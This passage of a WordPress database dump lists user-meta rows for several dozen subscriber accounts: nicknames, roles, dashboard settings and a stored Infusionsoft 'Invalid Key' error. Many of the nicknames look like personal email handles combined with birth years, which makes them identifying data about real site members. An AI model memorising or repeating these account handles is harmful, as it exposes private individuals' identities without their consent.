(42002, 3222, 'show_admin_bar_front', 'true'),
(42003, 3222, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42004, 3222, 'cyb_user_level', '0'),
(42005, 3222, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42006, 3222, 'default_password_nag', '1'),
(42007, 3223, 'nickname', 'lhoward20061951'),
(42008, 3223, 'first_name', ''),
(42009, 3223, 'last_name', ''),
(42010, 3223, 'description', ''),
(42011, 3223, 'rich_editing', 'true'),
(42012, 3223, 'comment_shortcuts', 'false'),
(42013, 3223, 'admin_color', 'fresh'),
(42014, 3223, 'use_ssl', '0'),
(42015, 3223, 'show_admin_bar_front', 'true'),
(42016, 3223, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42017, 3223, 'cyb_user_level', '0'),
(42018, 3223, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42019, 3223, 'default_password_nag', '1'),
(42020, 3224, 'nickname', 'mike195401964'),
(42021, 3224, 'first_name', ''),
(42022, 3224, 'last_name', ''),
(42023, 3224, 'description', ''),
(42024, 3224, 'rich_editing', 'true'),
(42025, 3224, 'comment_shortcuts', 'false'),
(42026, 3224, 'admin_color', 'fresh'),
(42027, 3224, 'use_ssl', '0'),
(42028, 3224, 'show_admin_bar_front', 'true'),
(42029, 3224, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42030, 3224, 'cyb_user_level', '0'),
(42031, 3224, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42032, 3224, 'default_password_nag', '1'),
(42033, 3225, 'nickname', 'hlstalk1974'),
(42034, 3225, 'first_name', ''),
(42035, 3225, 'last_name', ''),
(42036, 3225, 'description', ''),
(42037, 3225, 'rich_editing', 'true'),
(42038, 3225, 'comment_shortcuts', 'false'),
(42039, 3225, 'admin_color', 'fresh'),
(42040, 3225, 'use_ssl', '0'),
(42041, 3225, 'show_admin_bar_front', 'true'),
(42042, 3225, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42043, 3225, 'cyb_user_level', '0'),
(42044, 3225, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42045, 3225, 'default_password_nag', '1'),
(42046, 3226, 'nickname', 'raccoonsatemybaby1994'),
(42047, 3226, 'first_name', ''),
(42048, 3226, 'last_name', ''),
(42049, 3226, 'description', ''),
(42050, 3226, 'rich_editing', 'true'),
(42051, 3226, 'comment_shortcuts', 'false'),
(42052, 3226, 'admin_color', 'fresh'),
(42053, 3226, 'use_ssl', '0'),
(42054, 3226, 'show_admin_bar_front', 'true'),
(42055, 3226, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42056, 3226, 'cyb_user_level', '0'),
(42057, 3226, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42058, 3226, 'default_password_nag', '1'),
(42059, 3227, 'nickname', 'ashleybmk1962'),
(42060, 3227, 'first_name', ''),
(42061, 3227, 'last_name', ''),
(42062, 3227, 'description', ''),
(42063, 3227, 'rich_editing', 'true'),
(42064, 3227, 'comment_shortcuts', 'false'),
(42065, 3227, 'admin_color', 'fresh'),
(42066, 3227, 'use_ssl', '0'),
(42067, 3227, 'show_admin_bar_front', 'true'),
(42068, 3227, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42069, 3227, 'cyb_user_level', '0'),
(42070, 3227, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42071, 3227, 'default_password_nag', '1'),
(42072, 3228, 'nickname', 'veropie131957'),
(42073, 3228, 'first_name', ''),
(42074, 3228, 'last_name', ''),
(42075, 3228, 'description', ''),
(42076, 3228, 'rich_editing', 'true'),
(42077, 3228, 'comment_shortcuts', 'false'),
(42078, 3228, 'admin_color', 'fresh'),
(42079, 3228, 'use_ssl', '0'),
(42080, 3228, 'show_admin_bar_front', 'true'),
(42081, 3228, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42082, 3228, 'cyb_user_level', '0'),
(42083, 3228, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42084, 3228, 'default_password_nag', '1'),
(42085, 3229, 'nickname', 'cj.michaelsun1958'),
(42086, 3229, 'first_name', ''),
(42087, 3229, 'last_name', ''),
(42088, 3229, 'description', ''),
(42089, 3229, 'rich_editing', 'true'),
(42090, 3229, 'comment_shortcuts', 'false'),
(42091, 3229, 'admin_color', 'fresh'),
(42092, 3229, 'use_ssl', '0'),
(42093, 3229, 'show_admin_bar_front', 'true'),
(42094, 3229, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42095, 3229, 'cyb_user_level', '0'),
(42096, 3229, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42097, 3229, 'default_password_nag', '1'),
(42098, 3230, 'nickname', 'djcrums1957'),
(42099, 3230, 'first_name', ''),
(42100, 3230, 'last_name', ''),
(42101, 3230, 'description', ''),
(42102, 3230, 'rich_editing', 'true'),
(42103, 3230, 'comment_shortcuts', 'false'),
(42104, 3230, 'admin_color', 'fresh'),
(42105, 3230, 'use_ssl', '0'),
(42106, 3230, 'show_admin_bar_front', 'true'),
(42107, 3230, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42108, 3230, 'cyb_user_level', '0'),
(42109, 3230, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42110, 3230, 'default_password_nag', '1'),
(42111, 3231, 'nickname', 'seanguzik1974'),
(42112, 3231, 'first_name', ''),
(42113, 3231, 'last_name', ''),
(42114, 3231, 'description', ''),
(42115, 3231, 'rich_editing', 'true'),
(42116, 3231, 'comment_shortcuts', 'false'),
(42117, 3231, 'admin_color', 'fresh'),
(42118, 3231, 'use_ssl', '0'),
(42119, 3231, 'show_admin_bar_front', 'true'),
(42120, 3231, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42121, 3231, 'cyb_user_level', '0'),
(42122, 3231, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42123, 3231, 'default_password_nag', '1'),
(42124, 3232, 'nickname', 'denniskcheung1964'),
(42125, 3232, 'first_name', ''),
(42126, 3232, 'last_name', ''),
(42127, 3232, 'description', ''),
(42128, 3232, 'rich_editing', 'true'),
(42129, 3232, 'comment_shortcuts', 'false'),
(42130, 3232, 'admin_color', 'fresh'),
(42131, 3232, 'use_ssl', '0'),
(42132, 3232, 'show_admin_bar_front', 'true'),
(42133, 3232, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42134, 3232, 'cyb_user_level', '0'),
(42135, 3232, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42136, 3232, 'default_password_nag', '1'),
(42137, 3233, 'nickname', 'intothevoid19982010'),
(42138, 3233, 'first_name', ''),
(42139, 3233, 'last_name', ''),
(42140, 3233, 'description', ''),
(42141, 3233, 'rich_editing', 'true'),
(42142, 3233, 'comment_shortcuts', 'false'),
(42143, 3233, 'admin_color', 'fresh'),
(42144, 3233, 'use_ssl', '0'),
(42145, 3233, 'show_admin_bar_front', 'true'),
(42146, 3233, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42147, 3233, 'cyb_user_level', '0'),
(42148, 3233, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42149, 3233, 'default_password_nag', '1'),
(42150, 3234, 'nickname', 'ciaravpatterson11974'),
(42151, 3234, 'first_name', ''),
(42152, 3234, 'last_name', ''),
(42153, 3234, 'description', ''),
(42154, 3234, 'rich_editing', 'true'),
(42155, 3234, 'comment_shortcuts', 'false'),
(42156, 3234, 'admin_color', 'fresh'),
(42157, 3234, 'use_ssl', '0'),
(42158, 3234, 'show_admin_bar_front', 'true'),
(42159, 3234, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42160, 3234, 'cyb_user_level', '0'),
(42161, 3234, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42162, 3234, 'default_password_nag', '1'),
(42163, 3235, 'nickname', 'support1951'),
(42164, 3235, 'first_name', ''),
(42165, 3235, 'last_name', ''),
(42166, 3235, 'description', ''),
(42167, 3235, 'rich_editing', 'true'),
(42168, 3235, 'comment_shortcuts', 'false'),
(42169, 3235, 'admin_color', 'fresh'),
(42170, 3235, 'use_ssl', '0'),
(42171, 3235, 'show_admin_bar_front', 'true'),
(42172, 3235, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42173, 3235, 'cyb_user_level', '0'),
(42174, 3235, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42175, 3235, 'default_password_nag', '1'),
(42176, 3236, 'nickname', 'droming1994'),
(42177, 3236, 'first_name', ''),
(42178, 3236, 'last_name', ''),
(42179, 3236, 'description', ''),
(42180, 3236, 'rich_editing', 'true'),
(42181, 3236, 'comment_shortcuts', 'false'),
(42182, 3236, 'admin_color', 'fresh'),
(42183, 3236, 'use_ssl', '0'),
(42184, 3236, 'show_admin_bar_front', 'true'),
(42185, 3236, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42186, 3236, 'cyb_user_level', '0'),
(42187, 3236, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42188, 3236, 'default_password_nag', '1'),
(42189, 3237, 'nickname', 'hishikawa9591959'),
(42190, 3237, 'first_name', ''),
(42191, 3237, 'last_name', ''),
(42192, 3237, 'description', ''),
(42193, 3237, 'rich_editing', 'true'),
(42194, 3237, 'comment_shortcuts', 'false'),
(42195, 3237, 'admin_color', 'fresh'),
(42196, 3237, 'use_ssl', '0'),
(42197, 3237, 'show_admin_bar_front', 'true'),
(42198, 3237, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42199, 3237, 'cyb_user_level', '0'),
(42200, 3237, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42201, 3237, 'default_password_nag', '1'),
(42202, 3238, 'nickname', 'susiebug2221950'),
(42203, 3238, 'first_name', ''),
(42204, 3238, 'last_name', ''),
(42205, 3238, 'description', ''),
(42206, 3238, 'rich_editing', 'true'),
(42207, 3238, 'comment_shortcuts', 'false'),
(42208, 3238, 'admin_color', 'fresh'),
(42209, 3238, 'use_ssl', '0'),
(42210, 3238, 'show_admin_bar_front', 'true'),
(42211, 3238, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42212, 3238, 'cyb_user_level', '0'),
(42213, 3238, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42214, 3238, 'default_password_nag', '1'),
(42227, 3239, 'default_password_nag', '1'),
(42228, 3240, 'nickname', 'semmienow1951'),
(42229, 3240, 'first_name', ''),
(42230, 3240, 'last_name', ''),
(42231, 3240, 'description', ''),
(42232, 3240, 'rich_editing', 'true'),
(42233, 3240, 'comment_shortcuts', 'false'),
(42234, 3240, 'admin_color', 'fresh'),
(42235, 3240, 'use_ssl', '0'),
(42236, 3240, 'show_admin_bar_front', 'true'),
(42237, 3240, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42238, 3240, 'cyb_user_level', '0'),
(42239, 3240, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42240, 3240, 'default_password_nag', '1'),
(42241, 3241, 'nickname', 'sangyong.kwon2000'),
(42242, 3241, 'first_name', ''),
(42243, 3241, 'last_name', ''),
(42244, 3241, 'description', ''),
(42245, 3241, 'rich_editing', 'true'),
(42246, 3241, 'comment_shortcuts', 'false'),
(42247, 3241, 'admin_color', 'fresh'),
(42248, 3241, 'use_ssl', '0'),
(42249, 3241, 'show_admin_bar_front', 'true'),
(42250, 3241, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42251, 3241, 'cyb_user_level', '0'),
(42252, 3241, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42253, 3241, 'default_password_nag', '1'),
(42254, 3242, 'nickname', 'kel_hrbrt1981'),
(42255, 3242, 'first_name', ''),
(42256, 3242, 'last_name', ''),
(42257, 3242, 'description', ''),
(42258, 3242, 'rich_editing', 'true'),
(42259, 3242, 'comment_shortcuts', 'false'),
(42260, 3242, 'admin_color', 'fresh'),
(42261, 3242, 'use_ssl', '0'),
(42262, 3242, 'show_admin_bar_front', 'true'),
(42263, 3242, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42264, 3242, 'cyb_user_level', '0'),
(42265, 3242, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42266, 3242, 'default_password_nag', '1'),
(42267, 3243, 'nickname', 'dversiga841956'),
(42268, 3243, 'first_name', ''),
(42269, 3243, 'last_name', ''),
(42270, 3243, 'description', ''),
(42271, 3243, 'rich_editing', 'true'),
(42272, 3243, 'comment_shortcuts', 'false'),
(42273, 3243, 'admin_color', 'fresh'),
(42274, 3243, 'use_ssl', '0'),
(42275, 3243, 'show_admin_bar_front', 'true'),
(42276, 3243, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42277, 3243, 'cyb_user_level', '0'),
(42278, 3243, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42279, 3243, 'default_password_nag', '1'),
(42280, 3244, 'nickname', 'rmpeebles1952'),
(42281, 3244, 'first_name', ''),
(42282, 3244, 'last_name', ''),
(42283, 3244, 'description', ''),
(42284, 3244, 'rich_editing', 'true'),
(42285, 3244, 'comment_shortcuts', 'false'),
(42286, 3244, 'admin_color', 'fresh'),
(42287, 3244, 'use_ssl', '0'),
(42288, 3244, 'show_admin_bar_front', 'true'),
(42289, 3244, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42290, 3244, 'cyb_user_level', '0'),
(42291, 3244, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42292, 3244, 'default_password_nag', '1'),
(42293, 3245, 'nickname', 'lisa.abercrombie1970'),
(42294, 3245, 'first_name', ''),
(42295, 3245, 'last_name', ''),
(42296, 3245, 'description', ''),
(42297, 3245, 'rich_editing', 'true'),
(42298, 3245, 'comment_shortcuts', 'false'),
(42299, 3245, 'admin_color', 'fresh'),
(42300, 3245, 'use_ssl', '0'),
(42301, 3245, 'show_admin_bar_front', 'true'),
(42302, 3245, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42303, 3245, 'cyb_user_level', '0'),
(42304, 3245, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42305, 3245, 'default_password_nag', '1'),
(42306, 3246, 'nickname', 'movierocket1986'),
(42307, 3246, 'first_name', ''),
(42308, 3246, 'last_name', ''),
(42309, 3246, 'description', ''),
(42310, 3246, 'rich_editing', 'true'),
(42311, 3246, 'comment_shortcuts', 'false'),
(42312, 3246, 'admin_color', 'fresh'),
(42313, 3246, 'use_ssl', '0'),
(42314, 3246, 'show_admin_bar_front', 'true'),
(42315, 3246, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42316, 3246, 'cyb_user_level', '0'),
(42317, 3246, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42318, 3246, 'default_password_nag', '1'),
(42319, 3247, 'nickname', 'shawnatsbc1957'),
(42320, 3247, 'first_name', ''),
(42321, 3247, 'last_name', ''),
(42322, 3247, 'description', ''),
(42323, 3247, 'rich_editing', 'true'),
(42324, 3247, 'comment_shortcuts', 'false'),
(42325, 3247, 'admin_color', 'fresh'),
(42326, 3247, 'use_ssl', '0'),
(42327, 3247, 'show_admin_bar_front', 'true'),
(42328, 3247, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42329, 3247, 'cyb_user_level', '0'),
(42330, 3247, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42331, 3247, 'default_password_nag', '1'),
(42332, 3248, 'nickname', 'adamreitzel421989'),
(42333, 3248, 'first_name', ''),
(42334, 3248, 'last_name', ''),
(42335, 3248, 'description', ''),
(42336, 3248, 'rich_editing', 'true'),
(42337, 3248, 'comment_shortcuts', 'false'),
(42338, 3248, 'admin_color', 'fresh'),
(42339, 3248, 'use_ssl', '0'),
(42340, 3248, 'show_admin_bar_front', 'true'),
(42341, 3248, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42342, 3248, 'cyb_user_level', '0'),
(42343, 3248, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42344, 3248, 'default_password_nag', '1'),
(42345, 3249, 'nickname', 'tiggyfiggy2007'),
(42346, 3249, 'first_name', ''),
(42347, 3249, 'last_name', ''),
(42348, 3249, 'description', ''),
(42349, 3249, 'rich_editing', 'true'),
(42350, 3249, 'comment_shortcuts', 'false'),
(42351, 3249, 'admin_color', 'fresh'),
(42352, 3249, 'use_ssl', '0'),
(42353, 3249, 'show_admin_bar_front', 'true'),
(42354, 3249, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42355, 3249, 'cyb_user_level', '0'),
(42356, 3249, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42357, 3249, 'default_password_nag', '1'),
(42358, 3250, 'nickname', 'amazondbseller1995'),
(42359, 3250, 'first_name', ''),
(42360, 3250, 'last_name', ''),
(42361, 3250, 'description', ''),
(42362, 3250, 'rich_editing', 'true'),
(42363, 3250, 'comment_shortcuts', 'false'),
(42364, 3250, 'admin_color', 'fresh'),
(42365, 3250, 'use_ssl', '0'),
(42366, 3250, 'show_admin_bar_front', 'true'),
(42367, 3250, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42368, 3250, 'cyb_user_level', '0'),
(42369, 3250, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42370, 3250, 'default_password_nag', '1'),
(42371, 3251, 'nickname', 'pballesterosp1997'),
(42372, 3251, 'first_name', ''),
(42373, 3251, 'last_name', ''),
(42374, 3251, 'description', ''),
(42375, 3251, 'rich_editing', 'true'),
(42376, 3251, 'comment_shortcuts', 'false'),
(42377, 3251, 'admin_color', 'fresh'),
(42378, 3251, 'use_ssl', '0'),
(42379, 3251, 'show_admin_bar_front', 'true'),
(42380, 3251, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42381, 3251, 'cyb_user_level', '0'),
(42382, 3251, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42383, 3251, 'default_password_nag', '1'),
(42384, 3252, 'nickname', 'madsenmunch1971'),
(42385, 3252, 'first_name', ''),
(42386, 3252, 'last_name', ''),
(42387, 3252, 'description', ''),
(42388, 3252, 'rich_editing', 'true'),
(42389, 3252, 'comment_shortcuts', 'false'),
(42390, 3252, 'admin_color', 'fresh'),
(42391, 3252, 'use_ssl', '0'),
(42392, 3252, 'show_admin_bar_front', 'true'),
(42393, 3252, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42394, 3252, 'cyb_user_level', '0'),
(42395, 3252, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42396, 3252, 'default_password_nag', '1'),
(42397, 3253, 'nickname', 'villas5mom2001'),
(42398, 3253, 'first_name', ''),
(42399, 3253, 'last_name', ''),
(42400, 3253, 'description', ''),
(42401, 3253, 'rich_editing', 'true'),
(42402, 3253, 'comment_shortcuts', 'false'),
(42403, 3253, 'admin_color', 'fresh'),
(42404, 3253, 'use_ssl', '0'),
(42405, 3253, 'show_admin_bar_front', 'true'),
(42406, 3253, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42407, 3253, 'cyb_user_level', '0'),
(42408, 3253, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42409, 3253, 'default_password_nag', '1'),
(42410, 3254, 'nickname', 'catherine10052010'),
(42411, 3254, 'first_name', ''),
(42412, 3254, 'last_name', ''),
(42413, 3254, 'description', ''),
(42414, 3254, 'rich_editing', 'true'),
(42415, 3254, 'comment_shortcuts', 'false'),
(42416, 3254, 'admin_color', 'fresh'),
(42417, 3254, 'use_ssl', '0'),
(42418, 3254, 'show_admin_bar_front', 'true'),
(42419, 3254, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42420, 3254, 'cyb_user_level', '0'),
(42421, 3254, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42422, 3254, 'default_password_nag', '1'),
(42423, 3255, 'nickname', 'carolynbaas1996'),
(42424, 3255, 'first_name', ''),
(42425, 3255, 'last_name', ''),
(42426, 3255, 'description', ''),
(42427, 3255, 'rich_editing', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(42428, 3255, 'comment_shortcuts', 'false'),
(42429, 3255, 'admin_color', 'fresh'),
(42430, 3255, 'use_ssl', '0'),
(42431, 3255, 'show_admin_bar_front', 'true'),
(42432, 3255, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42433, 3255, 'cyb_user_level', '0'),
(42434, 3255, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42435, 3255, 'default_password_nag', '1'),
(42436, 3256, 'nickname', 'reter222xx1984'),
(42437, 3256, 'first_name', ''),
(42438, 3256, 'last_name', ''),
(42439, 3256, 'description', ''),
(42440, 3256, 'rich_editing', 'true'),
(42441, 3256, 'comment_shortcuts', 'false'),
(42442, 3256, 'admin_color', 'fresh'),
(42443, 3256, 'use_ssl', '0'),
(42444, 3256, 'show_admin_bar_front', 'true'),
(42445, 3256, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42446, 3256, 'cyb_user_level', '0'),
(42447, 3256, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42448, 3256, 'default_password_nag', '1'),
(42449, 3257, 'nickname', 'ajw1993'),
(42450, 3257, 'first_name', ''),
(42451, 3257, 'last_name', ''),
(42452, 3257, 'description', ''),
(42453, 3257, 'rich_editing', 'true'),
(42454, 3257, 'comment_shortcuts', 'false'),
(42455, 3257, 'admin_color', 'fresh'),
(42456, 3257, 'use_ssl', '0'),
(42457, 3257, 'show_admin_bar_front', 'true'),
(42458, 3257, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42459, 3257, 'cyb_user_level', '0'),
(42460, 3257, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42461, 3257, 'default_password_nag', '1'),
(42462, 3258, 'nickname', 'scarlett6201969'),
(42463, 3258, 'first_name', ''),
(42464, 3258, 'last_name', ''),
(42465, 3258, 'description', ''),
(42466, 3258, 'rich_editing', 'true'),
(42467, 3258, 'comment_shortcuts', 'false'),
(42468, 3258, 'admin_color', 'fresh'),
(42469, 3258, 'use_ssl', '0'),
(42470, 3258, 'show_admin_bar_front', 'true'),
(42471, 3258, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42472, 3258, 'cyb_user_level', '0'),
(42473, 3258, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42474, 3258, 'default_password_nag', '1'),
(42490, 3260, 'last_name', ''),
(42491, 3260, 'description', ''),
(42492, 3260, 'rich_editing', 'true'),
(42493, 3260, 'comment_shortcuts', 'false'),
(42494, 3260, 'admin_color', 'fresh'),
(42495, 3260, 'use_ssl', '0'),
(42496, 3260, 'show_admin_bar_front', 'true'),
(42497, 3260, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42498, 3260, 'cyb_user_level', '0'),
(42499, 3260, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42500, 3260, 'default_password_nag', '1'),
(42501, 3261, 'nickname', 'jaouadrapido2010'),
(42502, 3261, 'first_name', ''),
(42503, 3261, 'last_name', ''),
(42504, 3261, 'description', ''),
(42505, 3261, 'rich_editing', 'true'),
(42506, 3261, 'comment_shortcuts', 'false'),
(42507, 3261, 'admin_color', 'fresh'),
(42508, 3261, 'use_ssl', '0'),
(42509, 3261, 'show_admin_bar_front', 'true'),
(42510, 3261, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(42511, 3261, 'cyb_user_level', '0'),
(42512, 3261, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(42513, 3261, 'default_password_nag', '1'),
(42514, 3262, 'nickname', 'robustllc1998'),
(42515, 3262, 'first_name', ''),
(42516, 3262, 'last_name', ''),
